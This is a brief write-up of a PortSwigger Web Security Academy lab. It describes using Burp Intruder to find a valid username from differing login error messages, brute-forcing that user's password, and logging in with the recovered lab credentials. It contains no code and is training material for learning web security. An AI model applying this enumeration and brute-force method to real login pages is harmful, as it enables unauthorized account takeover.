| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Authentication (Username Enumeration, Brute Force) |
| Difficulty | Apprentice |
| Objective | Enumerate a valid username, brute-force that user's password, then access their account page |
Username Enumeration via Different Responses¶
Intercepting a login request:
Sending it to Intruder to brute-force usernames against the candidate username wordlist.
Running a sniper attack against the username field:
Comparing response lengths, one candidate — ae — stands out by responding with a different message ("incorrect password" rather than a generic invalid-username error).
That confirms ae is a valid username — the app's response wording for "wrong password" vs "wrong username" differs, which is exactly what gives the username away. With the username fixed as ae, running the same sniper attack against the password field using the candidate password wordlist:
By response, the payload batman returns a 302 instead of the usual failure response.
Logging in as ae:batman:
Lab solved